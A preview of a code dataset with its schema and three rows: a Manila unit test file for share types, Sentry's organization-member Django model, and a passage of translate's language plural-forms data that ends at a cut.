| column | type | stats |
|---|---|---|
| repo_name | stringlengths | 5 – 100 |
| path | stringlengths | 4 – 299 |
| copies | stringclasses | 990 values |
| size | stringlengths | 4 – 7 |
| content | stringlengths | 666 – 1.03M |
| license | stringclasses | 15 values |
| hash | int64 | -9,223,351,895,964,839,000 – 9,223,297,778B |
| line_mean | float64 | 3.17 – 100 |
| line_max | int64 | 7 – 1k |
| alpha_frac | float64 | 0.25 – 0.98 |
| autogenerated | bool | 1 class |
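Each data row below starts with the repository metadata fields (repo_name, path, copies, size), continues with the raw file contents, and closes with the remaining fields (license, hash, line_mean, line_max, alpha_frac, autogenerated). As a minimal sketch of how this schema can be used, assuming the rows have already been materialized as an iterable of dicts keyed by the column names above (this preview does not specify the actual loading mechanism):

```python
# Minimal sketch: filter and summarize rows by schema fields.
# Assumes `rows` is an iterable of dicts keyed by the columns above;
# the loading step itself is not shown in this preview.
from collections import Counter

def summarize(rows):
    licenses = Counter()
    kept = []
    for row in rows:
        if row["autogenerated"]:        # skip generated files
            continue
        if int(row["size"]) > 100000:   # `size` is stored as a string
            continue
        licenses[row["license"]] += 1
        kept.append((row["repo_name"], row["path"]))
    return licenses, kept
```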
weiting-chen/manila | manila/tests/share/test_share_types.py | 1 | 10100 |
# Copyright 2015 Deutsche Telekom AG. All rights reserved.
# Copyright 2015 Tom Barron. All rights reserved.
# Copyright 2015 Mirantis, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test of Share Type methods for Manila."""
import copy
import datetime
import ddt
import mock
from manila.common import constants
from manila import context
from manila import db
from manila import exception
from manila.share import share_types
from manila import test
def create_share_type_dict(extra_specs=None):
return {
'fake_type': {
'name': 'fake1',
'extra_specs': extra_specs
}
}
@ddt.ddt
class ShareTypesTestCase(test.TestCase):
fake_type = {
'test': {
'created_at': datetime.datetime(2015, 1, 22, 11, 43, 24),
'deleted': '0',
'deleted_at': None,
'extra_specs': {},
'required_extra_specs': {},
'id': u'fooid-1',
'name': u'test',
'updated_at': None
}
}
fake_extra_specs = {u'gold': u'True'}
fake_share_type_id = u'fooid-2'
fake_type_w_extra = {
'test_with_extra': {
'created_at': datetime.datetime(2015, 1, 22, 11, 45, 31),
'deleted': '0',
'deleted_at': None,
'extra_specs': fake_extra_specs,
'required_extra_specs': {},
'id': fake_share_type_id,
'name': u'test_with_extra',
'updated_at': None
}
}
fake_type_w_valid_extra = {
'test_with_extra': {
'created_at': datetime.datetime(2015, 1, 22, 11, 45, 31),
'deleted': '0',
'deleted_at': None,
'extra_specs': {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
},
'required_extra_specs': {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
},
'id': u'fooid-2',
'name': u'test_with_extra',
'updated_at': None
}
}
fake_types = dict(fake_type.items() + fake_type_w_extra.items()
+ fake_type_w_valid_extra.items())
fake_share = {'id': u'fooid-1', 'share_type_id': fake_share_type_id}
def setUp(self):
super(ShareTypesTestCase, self).setUp()
self.context = context.get_admin_context()
@ddt.data({}, fake_type, fake_type_w_extra, fake_types)
def test_get_all_types(self, share_type):
self.mock_object(db,
'share_type_get_all',
mock.Mock(return_value=copy.deepcopy(share_type)))
returned_type = share_types.get_all_types(self.context)
self.assertItemsEqual(share_type, returned_type)
def test_get_all_types_search(self):
share_type = self.fake_type_w_extra
search_filter = {"extra_specs": {"gold": "True"}, 'is_public': True}
self.mock_object(db,
'share_type_get_all',
mock.Mock(return_value=share_type))
returned_type = share_types.get_all_types(self.context,
search_opts=search_filter)
db.share_type_get_all.assert_called_once_with(
mock.ANY, 0, filters={'is_public': True})
self.assertItemsEqual(share_type, returned_type)
search_filter = {"extra_specs": {"gold": "False"}}
returned_type = share_types.get_all_types(self.context,
search_opts=search_filter)
self.assertEqual({}, returned_type)
def test_get_share_type_extra_specs(self):
share_type = self.fake_type_w_extra['test_with_extra']
self.mock_object(db,
'share_type_get',
mock.Mock(return_value=share_type))
id = share_type['id']
extra_spec = share_types.get_share_type_extra_specs(id, key='gold')
self.assertEqual(share_type['extra_specs']['gold'], extra_spec)
extra_spec = share_types.get_share_type_extra_specs(id)
self.assertEqual(share_type['extra_specs'], extra_spec)
def test_share_types_diff(self):
share_type1 = self.fake_type['test']
share_type2 = self.fake_type_w_extra['test_with_extra']
expected_diff = {'extra_specs': {u'gold': (None, u'True')}}
self.mock_object(db,
'share_type_get',
mock.Mock(side_effect=[share_type1, share_type2]))
(diff, equal) = share_types.share_types_diff(self.context,
share_type1['id'],
share_type2['id'])
self.assertFalse(equal)
self.assertEqual(expected_diff, diff)
def test_share_types_diff_equal(self):
share_type = self.fake_type['test']
self.mock_object(db,
'share_type_get',
mock.Mock(return_value=share_type))
(diff, equal) = share_types.share_types_diff(self.context,
share_type['id'],
share_type['id'])
self.assertTrue(equal)
def test_get_extra_specs_from_share(self):
expected = self.fake_extra_specs
self.mock_object(share_types, 'get_share_type_extra_specs',
mock.Mock(return_value=expected))
spec_value = share_types.get_extra_specs_from_share(self.fake_share)
self.assertEqual(expected, spec_value)
share_types.get_share_type_extra_specs.assert_called_once_with(
self.fake_share_type_id)
@ddt.data({},
{"fake": "fake"},
{constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: None})
def test_create_without_required_extra_spec(self, extra_specs):
name = "fake_share_type"
self.assertRaises(exception.InvalidShareType, share_types.create,
self.context, name, extra_specs)
def test_get_share_type_required_extra_specs(self):
valid_required_extra_specs = (
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS,)
actual_result = share_types.get_required_extra_specs()
self.assertEqual(valid_required_extra_specs, actual_result)
def test_validate_required_extra_spec_other(self):
actual_result = share_types.is_valid_required_extra_spec(
'fake', 'fake')
self.assertEqual(None, actual_result)
@ddt.data('1', 'True', 'false', '0', True, False)
def test_validate_required_extra_spec_valid(self, value):
key = constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS
actual_result = share_types.is_valid_required_extra_spec(key, value)
self.assertEqual(True, actual_result)
@ddt.data('invalid', {}, '0000000000')
def test_validate_required_extra_spec_invalid(self, value):
key = constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS
actual_result = share_types.is_valid_required_extra_spec(key, value)
self.assertEqual(False, actual_result)
@ddt.data({constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'},
{constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true',
'another_key': True})
def test_get_valid_required_extra_specs_valid(self, specs):
actual_result = share_types.get_valid_required_extra_specs(specs)
valid_result = {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
}
self.assertEqual(valid_result, actual_result)
@ddt.data(None, {})
def test_get_valid_required_extra_specs_invalid(self, specs):
self.assertRaises(exception.InvalidExtraSpec,
share_types.get_valid_required_extra_specs, specs)
def test_add_access(self):
project_id = '456'
extra_specs = {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
}
share_type = share_types.create(self.context, 'type1', extra_specs)
share_type_id = share_type.get('id')
share_types.add_share_type_access(self.context, share_type_id,
project_id)
stype_access = db.share_type_access_get_all(self.context,
share_type_id)
self.assertIn(project_id, [a.project_id for a in stype_access])
def test_add_access_invalid(self):
self.assertRaises(exception.InvalidShareType,
share_types.add_share_type_access,
'fake', None, 'fake')
def test_remove_access(self):
project_id = '456'
extra_specs = {
constants.ExtraSpecs.DRIVER_HANDLES_SHARE_SERVERS: 'true'
}
share_type = share_types.create(
self.context, 'type1', projects=['456'], extra_specs=extra_specs)
share_type_id = share_type.get('id')
share_types.remove_share_type_access(self.context, share_type_id,
project_id)
stype_access = db.share_type_access_get_all(self.context,
share_type_id)
self.assertNotIn(project_id, stype_access)
def test_remove_access_invalid(self):
self.assertRaises(exception.InvalidShareType,
share_types.remove_share_type_access,
'fake', None, 'fake')
| apache-2.0 | 3,600,138,572,918,314,500 | 38.299611 | 78 | 0.572178 | false |
gencer/sentry | src/sentry/models/organizationmember.py | 1 | 8468 |
"""
sentry.models.organizationmember
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import six
from bitfield import BitField
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models, transaction
from django.utils import timezone
from django.utils.encoding import force_bytes
from hashlib import md5
from structlog import get_logger
from uuid import uuid4
from six.moves.urllib.parse import urlencode
from sentry import roles
from sentry.db.models import (
BaseModel, BoundedAutoField, BoundedPositiveIntegerField, FlexibleForeignKey, Model, sane_repr
)
from sentry.utils.http import absolute_uri
class OrganizationMemberTeam(BaseModel):
__core__ = True
id = BoundedAutoField(primary_key=True)
team = FlexibleForeignKey('sentry.Team')
organizationmember = FlexibleForeignKey('sentry.OrganizationMember')
# an inactive membership simply removes the team from the default list
# but still allows them to re-join without request
is_active = models.BooleanField(default=True)
class Meta:
app_label = 'sentry'
db_table = 'sentry_organizationmember_teams'
unique_together = (('team', 'organizationmember'), )
__repr__ = sane_repr('team_id', 'organizationmember_id')
def get_audit_log_data(self):
return {
'team_slug': self.team.slug,
'member_id': self.organizationmember_id,
'email': self.organizationmember.get_email(),
'is_active': self.is_active,
}
class OrganizationMember(Model):
"""
Identifies relationships between teams and users.
Users listed as team members are considered to have access to all projects
and could be thought of as team owners (though their access level may not
be set to ownership).
"""
__core__ = True
organization = FlexibleForeignKey('sentry.Organization', related_name="member_set")
user = FlexibleForeignKey(
settings.AUTH_USER_MODEL, null=True, blank=True, related_name="sentry_orgmember_set"
)
email = models.EmailField(null=True, blank=True)
role = models.CharField(
choices=roles.get_choices(),
max_length=32,
default=roles.get_default().id,
)
flags = BitField(
flags=(('sso:linked', 'sso:linked'), ('sso:invalid', 'sso:invalid'), ), default=0
)
token = models.CharField(max_length=64, null=True, blank=True, unique=True)
date_added = models.DateTimeField(default=timezone.now)
has_global_access = models.BooleanField(default=True)
teams = models.ManyToManyField(
'sentry.Team', blank=True, through='sentry.OrganizationMemberTeam'
)
# Deprecated -- no longer used
type = BoundedPositiveIntegerField(default=50, blank=True)
class Meta:
app_label = 'sentry'
db_table = 'sentry_organizationmember'
unique_together = (('organization', 'user'), ('organization', 'email'), )
__repr__ = sane_repr(
'organization_id',
'user_id',
'role',
)
@transaction.atomic
def save(self, *args, **kwargs):
assert self.user_id or self.email, \
'Must set user or email'
super(OrganizationMember, self).save(*args, **kwargs)
@property
def is_pending(self):
return self.user_id is None
@property
def legacy_token(self):
checksum = md5()
checksum.update(six.text_type(self.organization_id).encode('utf-8'))
checksum.update(self.get_email().encode('utf-8'))
checksum.update(force_bytes(settings.SECRET_KEY))
return checksum.hexdigest()
def generate_token(self):
return uuid4().hex + uuid4().hex
def get_invite_link(self):
if not self.is_pending:
return None
return absolute_uri(
reverse(
'sentry-accept-invite',
kwargs={
'member_id': self.id,
'token': self.token or self.legacy_token,
}
)
)
def send_invite_email(self):
from sentry.utils.email import MessageBuilder
context = {
'email': self.email,
'organization': self.organization,
'url': self.get_invite_link(),
}
msg = MessageBuilder(
subject='Join %s in using Sentry' % self.organization.name,
template='sentry/emails/member-invite.txt',
html_template='sentry/emails/member-invite.html',
type='organization.invite',
context=context,
)
try:
msg.send_async([self.get_email()])
except Exception as e:
logger = get_logger(name='sentry.mail')
logger.exception(e)
def send_sso_link_email(self, actor, provider):
from sentry.utils.email import MessageBuilder
link_args = {'organization_slug': self.organization.slug}
context = {
'organization': self.organization,
'actor': actor,
'provider': provider,
'url': absolute_uri(reverse('sentry-auth-organization', kwargs=link_args)),
}
msg = MessageBuilder(
subject='Action Required for %s' % (self.organization.name, ),
template='sentry/emails/auth-link-identity.txt',
html_template='sentry/emails/auth-link-identity.html',
type='organization.auth_link',
context=context,
)
msg.send_async([self.get_email()])
def send_sso_unlink_email(self, actor, provider):
from sentry.utils.email import MessageBuilder
from sentry.models import LostPasswordHash
email = self.get_email()
recover_uri = '{path}?{query}'.format(
path=reverse('sentry-account-recover'),
query=urlencode({'email': email}),
)
context = {
'email': email,
'recover_url': absolute_uri(recover_uri),
'has_password': self.user.password,
'organization': self.organization,
'actor': actor,
'provider': provider,
}
if not self.user.password:
password_hash = LostPasswordHash.for_user(self.user)
context['set_password_url'] = password_hash.get_absolute_url(mode='set_password')
msg = MessageBuilder(
subject='Action Required for %s' % (self.organization.name, ),
template='sentry/emails/auth-sso-disabled.txt',
html_template='sentry/emails/auth-sso-disabled.html',
type='organization.auth_sso_disabled',
context=context,
)
msg.send_async([email])
def get_display_name(self):
if self.user_id:
return self.user.get_display_name()
return self.email
def get_label(self):
if self.user_id:
return self.user.get_label()
return self.email or self.id
def get_email(self):
if self.user_id:
return self.user.email
return self.email
def get_avatar_type(self):
if self.user_id:
return self.user.get_avatar_type()
return 'letter_avatar'
def get_audit_log_data(self):
from sentry.models import Team
return {
'email':
self.email,
'user':
self.user_id,
'teams':
list(
Team.objects.filter(
id__in=OrganizationMemberTeam.objects.filter(
organizationmember=self,
is_active=True,
).values_list('team', flat=True)
).values_list('id', flat=True)
),
'has_global_access':
self.has_global_access,
'role':
self.role,
}
def get_teams(self):
from sentry.models import Team
if roles.get(self.role).is_global:
return self.organization.team_set.all()
return Team.objects.filter(
id__in=OrganizationMemberTeam.objects.filter(
organizationmember=self,
is_active=True,
).values('team')
)
def get_scopes(self):
return roles.get(self.role).scopes
| bsd-3-clause | 6,796,139,071,126,987,000 | 30.597015 | 98 | 0.596953 | false |
diorcety/translate | translate/lang/data.py | 1 | 27541 |
# -*- coding: utf-8 -*-
#
# Copyright 2007-2011 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""This module stores information and functionality that relates to plurals."""
from __future__ import unicode_literals
import gettext
import locale
import os
import re
import six
try:
import pycountry
except ImportError:
pycountry = None
languages = {
'ach': ('Acholi', 2, 'n > 1'),
'af': ('Afrikaans', 2, '(n != 1)'),
'ak': ('Akan', 2, 'n > 1'),
'am': ('Amharic', 2, 'n > 1'),
'an': ('Aragonese', 2, '(n != 1)'),
'anp': ('Angika', 2, '(n != 1)'),
'ar': ('Arabic', 6,
'n==0 ? 0 : n==1 ? 1 : n==2 ? 2 : n%100>=3 && n%100<=10 ? 3 : n%100>=11 ? 4 : 5'),
'arn': ('Mapudungun; Mapuche', 2, 'n > 1'),
'as': ('Assamese', 2, '(n != 1)'),
'ast': ('Asturian; Bable; Leonese; Asturleonese', 2, '(n != 1)'),
'ay': ('Aymará', 1, '0'),
'az': ('Azerbaijani', 2, '(n != 1)'),
'be': ('Belarusian', 3,
'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2'),
'bg': ('Bulgarian', 2, '(n != 1)'),
'bn': ('Bengali', 2, '(n != 1)'),
'bn_BD': ('Bengali (Bangladesh)', 2, '(n != 1)'),
'bn_IN': ('Bengali (India)', 2, '(n != 1)'),
'bo': ('Tibetan', 1, '0'),
'br': ('Breton', 2, 'n > 1'),
'brx': ('Bodo', 2, '(n != 1)'),
'bs': ('Bosnian', 3,
'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2'),
'ca': ('Catalan; Valencian', 2, '(n != 1)'),
'ca@valencia': ('Catalan; Valencian (Valencia)', 2, '(n != 1)'),
'cgg': ('Chiga', 1, '0'),
'cs': ('Czech', 3, '(n==1) ? 0 : (n>=2 && n<=4) ? 1 : 2'),
'csb': ('Kashubian', 3,
'n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2'),
'cy': ('Welsh', 2, '(n==2) ? 1 : 0'),
'da': ('Danish', 2, '(n != 1)'),
'de': ('German', 2, '(n != 1)'),
'doi': ('Dogri', 2, '(n != 1)'),
'dz': ('Dzongkha', 1, '0'),
'el': ('Greek, Modern (1453-)', 2, '(n != 1)'),
'en': ('English', 2, '(n != 1)'),
'en_GB': ('English (United Kingdom)', 2, '(n != 1)'),
'en_ZA': ('English (South Africa)', 2, '(n != 1)'),
'eo': ('Esperanto', 2, '(n != 1)'),
'es': ('Spanish; Castilian', 2, '(n != 1)'),
'es_AR': ('Argentinean Spanish', 2, '(n != 1)'),
'et': ('Estonian', 2, '(n != 1)'),
'eu': ('Basque', 2, '(n != 1)'),
'fa': ('Persian', 2, 'n > 1'),
'ff': ('Fulah', 2, '(n != 1)'),
'fi': ('Finnish', 2, '(n != 1)'),
'fil': ('Filipino; Pilipino', 2, '(n > 1)'),
'fo': ('Faroese', 2, '(n != 1)'),
'fr': ('French', 2, '(n > 1)'),
'fur': ('Friulian', 2, '(n != 1)'),
'fy': ('Frisian', 2, '(n != 1)'),
'ga': ('Irish', 5, 'n==1 ? 0 : n==2 ? 1 : (n>2 && n<7) ? 2 :(n>6 && n<11) ? 3 : 4'),
'gd': ('Gaelic; Scottish Gaelic', 4, '(n==1 || n==11) ? 0 : (n==2 || n==12) ? 1 : (n > 2 && n < 20) ? 2 : 3'),
'gl': ('Galician', 2, '(n != 1)'),
'gu': ('Gujarati', 2, '(n != 1)'),
'gun': ('Gun', 2, '(n > 1)'),
'ha': ('Hausa', 2, '(n != 1)'),
'he': ('Hebrew', 2, '(n != 1)'),
'hi': ('Hindi', 2, '(n != 1)'),
'hne': ('Chhattisgarhi', 2, '(n != 1)'),
'hr': ('Croatian', 3, '(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'ht': ('Haitian; Haitian Creole', 2, '(n != 1)'),
'hu': ('Hungarian', 2, '(n != 1)'),
'hy': ('Armenian', 1, '0'),
'ia': ("Interlingua (International Auxiliary Language Association)", 2, '(n != 1)'),
'id': ('Indonesian', 1, '0'),
'is': ('Icelandic', 2, '(n != 1)'),
'it': ('Italian', 2, '(n != 1)'),
'ja': ('Japanese', 1, '0'),
'jbo': ('Lojban', 1, '0'),
'jv': ('Javanese', 2, '(n != 1)'),
'ka': ('Georgian', 1, '0'),
'kab': ('Kabyle', 2, '(n != 1)'),
'kk': ('Kazakh', 2, 'n != 1'),
'kl': ('Greenlandic', 2, '(n != 1)'),
'km': ('Central Khmer', 1, '0'),
'kn': ('Kannada', 2, '(n != 1)'),
'ko': ('Korean', 1, '0'),
'kok': ('Konkani', 2, '(n != 1)'),
'ks': ('Kashmiri', 2, '(n != 1)'),
'ku': ('Kurdish', 2, '(n != 1)'),
'kw': ('Cornish', 4, '(n==1) ? 0 : (n==2) ? 1 : (n == 3) ? 2 : 3'),
'ky': ('Kirghiz; Kyrgyz', 2, 'n != 1'),
'lb': ('Luxembourgish; Letzeburgesch', 2, '(n != 1)'),
'ln': ('Lingala', 2, '(n > 1)'),
'lo': ('Lao', 1, '0'),
'lt': ('Lithuanian', 3, '(n%10==1 && n%100!=11 ? 0 : n%10>=2 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'lv': ('Latvian', 3, '(n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2)'),
'mai': ('Maithili', 2, '(n != 1)'),
'me': ('Montenegrin', 3, 'n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2'),
'mfe': ('Morisyen', 2, '(n > 1)'),
'mg': ('Malagasy', 2, '(n > 1)'),
'mi': ('Maori', 2, '(n > 1)'),
'mk': ('Macedonian', 2, '(n==1 || n%10==1 ? 0 : 1)'),
'ml': ('Malayalam', 2, '(n != 1)'),
'mn': ('Mongolian', 2, '(n != 1)'),
'mni': ('Meithei (Manipuri)', 2, '(n != 1)'),
'mnk': ('Mandinka', 3, '(n==0 ? 0 : n==1 ? 1 : 2)'),
'mr': ('Marathi', 2, '(n != 1)'),
'ms': ('Malay', 1, '0'),
'mt': ('Maltese', 4,
'(n==1 ? 0 : n==0 || ( n%100>1 && n%100<11) ? 1 : (n%100>10 && n%100<20 ) ? 2 : 3)'),
'my': ('Burmese', 1, '0'),
'nah': ('Nahuatl languages', 2, '(n != 1)'),
'nap': ('Neapolitan', 2, '(n != 1)'),
'nb': ('Bokmål, Norwegian; Norwegian Bokmål', 2, '(n != 1)'),
'ne': ('Nepali', 2, '(n != 1)'),
'nl': ('Dutch; Flemish', 2, '(n != 1)'),
'nn': ('Norwegian Nynorsk; Nynorsk, Norwegian', 2, '(n != 1)'),
'nqo': ("N'Ko", 2, '(n > 1)'),
'nso': ('Pedi; Sepedi; Northern Sotho', 2, '(n != 1)'),
'oc': ('Occitan (post 1500)', 2, '(n > 1)'),
'or': ('Odia', 2, '(n != 1)'),
'pa': ('Panjabi; Punjabi', 2, '(n != 1)'),
'pap': ('Papiamento', 2, '(n != 1)'),
'pl': ('Polish', 3,
'(n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'pms': ('Piemontese', 2, '(n != 1)'),
'ps': ('Pushto; Pashto', 2, '(n != 1)'),
'pt': ('Portuguese', 2, '(n != 1)'),
'pt_BR': ('Portuguese (Brazil)', 2, '(n > 1)'),
'rm': ('Romansh', 2, '(n != 1)'),
'ro': ('Romanian', 3, '(n==1 ? 0 : (n==0 || (n%100 > 0 && n%100 < 20)) ? 1 : 2)'),
'ru': ('Russian', 3,
'(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'rw': ('Kinyarwanda', 2, '(n != 1)'),
'sa': ('Sanskrit', 3, '(n==1 ? 0 : n==2 ? 1 : 2)'),
'sah': ('Yakut', 1, '0'),
'sat': ('Santali', 2, '(n != 1)'),
'sco': ('Scots', 2, '(n != 1)'),
'sd': ('Sindhi', 2, '(n != 1)'),
'se': ('Northern Sami', 2, '(n != 1)'),
'si': ('Sinhala; Sinhalese', 2, '(n != 1)'),
'sk': ('Slovak', 3, '(n==1) ? 0 : (n>=2 && n<=4) ? 1 : 2'),
'sl': ('Slovenian', 4, '(n%100==1 ? 0 : n%100==2 ? 1 : n%100==3 || n%100==4 ? 2 : 3)'),
'so': ('Somali', 2, '(n != 1)'),
'son': ('Songhai languages', 1, '0'),
'sq': ('Albanian', 2, '(n != 1)'),
'sr': ('Serbian', 3,
'(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'st': ('Sotho, Southern', 2, '(n != 1)'),
'su': ('Sundanese', 1, '0'),
'sv': ('Swedish', 2, '(n != 1)'),
'sw': ('Swahili', 2, '(n != 1)'),
'szl': ('Silesian', 3,
'(n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'ta': ('Tamil', 2, '(n != 1)'),
'te': ('Telugu', 2, '(n != 1)'),
'tg': ('Tajik', 1, '0'),
'th': ('Thai', 1, '0'),
'ti': ('Tigrinya', 2, '(n > 1)'),
'tk': ('Turkmen', 2, '(n != 1)'),
'tr': ('Turkish', 2, '(n != 1)'),
'tt': ('Tatar', 1, '0'),
'ug': ('Uighur; Uyghur', 1, '0'),
'uk': ('Ukrainian', 3,
'(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)'),
'ur': ('Urdu', 2, '(n != 1)'),
'uz': ('Uzbek', 2, '(n > 1)'),
've': ('Venda', 2, '(n != 1)'),
'vi': ('Vietnamese', 1, '0'),
'wa': ('Walloon', 2, '(n > 1)'),
'wo': ('Wolof', 2, '(n != 1)'),
'yo': ('Yoruba', 2, '(n != 1)'),
'yue': ('Yue', 1, '0'),
# Chinese is difficult because the main divide is on script, not really
# country. Simplified Chinese is used mostly in China, Singapore and Malaysia.
# Traditional Chinese is used mostly in Hong Kong, Taiwan and Macau.
'zh_CN': ('Chinese (China)', 1, '0'),
'zh_HK': ('Chinese (Hong Kong)', 1, '0'),
'zh_TW': ('Chinese (Taiwan)', 1, '0'),
'zu': ('Zulu', 2, '(n != 1)'),
}
"""Dictionary of language data.
The language code is the dictionary key (which may contain country codes
and modifiers). The value is a tuple: (Full name in English from iso-codes,
nplurals, plural equation).
Note that the English names should not be used in user facing places - it
should always be passed through the function returned from tr_lang(), or at
least passed through _fix_language_name()."""
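# Example lookup (illustrative): each value is an
# (english_name, nplurals, plural_equation) tuple, e.g.
#   name, nplurals, plural_eq = languages['pl']
#   # ('Polish', 3, '(n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)')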
_fixed_names = {
"Asturian; Bable; Leonese; Asturleonese": "Asturian",
"Bokmål, Norwegian; Norwegian Bokmål": "Norwegian Bokmål",
"Catalan; Valencian": "Catalan",
"Central Khmer": "Khmer",
"Chichewa; Chewa; Nyanja": "Chewa; Nyanja",
"Divehi; Dhivehi; Maldivian": "Divehi",
"Dutch; Flemish": "Dutch",
"Filipino; Pilipino": "Filipino",
"Gaelic; Scottish Gaelic": "Scottish Gaelic",
"Greek, Modern (1453-)": "Greek",
"Interlingua (International Auxiliary Language Association)": "Interlingua",
"Kirghiz; Kyrgyz": "Kirghiz",
"Klingon; tlhIngan-Hol": "Klingon",
"Limburgan; Limburger; Limburgish": "Limburgish",
"Low German; Low Saxon; German, Low; Saxon, Low": "Low German",
"Luxembourgish; Letzeburgesch": "Luxembourgish",
"Ndebele, South; South Ndebele": "Southern Ndebele",
"Norwegian Nynorsk; Nynorsk, Norwegian": "Norwegian Nynorsk",
"Occitan (post 1500)": "Occitan",
"Panjabi; Punjabi": "Punjabi",
"Pedi; Sepedi; Northern Sotho": "Northern Sotho",
"Pushto; Pashto": "Pashto",
"Sinhala; Sinhalese": "Sinhala",
"Songhai languages": "Songhay",
"Sotho, Southern": "Sotho",
"Spanish; Castilian": "Spanish",
"Uighur; Uyghur": "Uyghur",
}
scripts = {
# Codes pulled from http://unicode.org/iso15924/iso15924-codes.html
# Scripts were figured out from the languages's Wikipedia pages and the
# real usage in https://mozilla.locamotion.org/
'Deva': [
'anp', # https://en.wikipedia.org/wiki/Angika_language
'bho', # https://en.wikipedia.org/wiki/Bhojpuri_language
'brx', # https://en.wikipedia.org/wiki/Bodo_language
'doi', # https://en.wikipedia.org/wiki/Dogri_language
'hi', # https://en.wikipedia.org/wiki/Hindi
'kfy', # https://en.wikipedia.org/wiki/Kumaoni_language
'kok', # https://en.wikipedia.org/wiki/Konkani_language
'mai', # https://en.wikipedia.org/wiki/Maithili_language
'mr', # https://en.wikipedia.org/wiki/Marathi_language
'sa', # https://en.wikipedia.org/wiki/Sanskrit
'sat', # https://en.wikipedia.org/wiki/Santali_language
],
'Beng': [
'bn', # https://en.wikipedia.org/wiki/Bengali_language
'mni', # https://en.wikipedia.org/wiki/Manipuri_language
],
'Tibt': [
'bo', # https://en.wikipedia.org/wiki/Standard_Tibetan
],
'Orya': [
'or', # https://en.wikipedia.org/wiki/Odia_language
],
'Gujr': [
'gu', # https://en.wikipedia.org/wiki/Gujarati_language
],
'Khmr': [
'km', # https://en.wikipedia.org/wiki/Khmer_language
],
'Knda': [
'kn', # https://en.wikipedia.org/wiki/Kannada
],
'Laoo': [
'lo', # https://en.wikipedia.org/wiki/Lao_language
],
'Mlym': [
'ml', # https://en.wikipedia.org/wiki/Malayalam
],
'Mymr': [
'my', # https://en.wikipedia.org/wiki/Burmese_language
'shn', # https://en.wikipedia.org/wiki/Shan_language
],
'Sind': [
'sd', # https://en.wikipedia.org/wiki/Sindhi_language
],
'Taml': [
'ta', # https://en.wikipedia.org/wiki/Tamil_language
],
# Unable to find the codes for the following scripts.
'assamese': [
'as', # https://en.wikipedia.org/wiki/Assamese_language
],
'perso-arabic': [
'ks', # https://en.wikipedia.org/wiki/Kashmiri_language
],
'chinese': [
'yue', # https://en.wikipedia.org/wiki/Yue_Chinese
],
}
"""Dictionary of scripts data.
The dictionary keys are ISO 15924 script codes, and script names where scripts
are missing from standard. The value is a list of codes for languages using
that script.
This is mainly used to alter the behavior of some checks (the accelerators one
for example)."""
cldr_plural_categories = [
'zero',
'one',
'two',
'few',
'many',
'other',
]
"""List of plural tags generated from CLDR 32.0.1 using
https://github.com/WeblateOrg/language-data
"""
plural_tags = {
'af': ['one', 'other'],
'ak': ['one', 'other'],
'am': ['one', 'other'],
'ar': ['zero', 'one', 'two', 'few', 'many', 'other'],
'ars': ['zero', 'one', 'two', 'few', 'many', 'other'],
'as': ['one', 'other'],
'asa': ['one', 'other'],
'ast': ['one', 'other'],
'az': ['one', 'other'],
'be': ['one', 'few', 'many'],
'bem': ['one', 'other'],
'bez': ['one', 'other'],
'bg': ['one', 'other'],
'bh': ['one', 'other'],
'bm': ['other'],
'bn': ['one', 'other'],
'bo': ['other'],
'br': ['one', 'two', 'few', 'many', 'other'],
'brx': ['one', 'other'],
'bs': ['one', 'few', 'other'],
'ca': ['one', 'other'],
'ce': ['one', 'other'],
'cgg': ['one', 'other'],
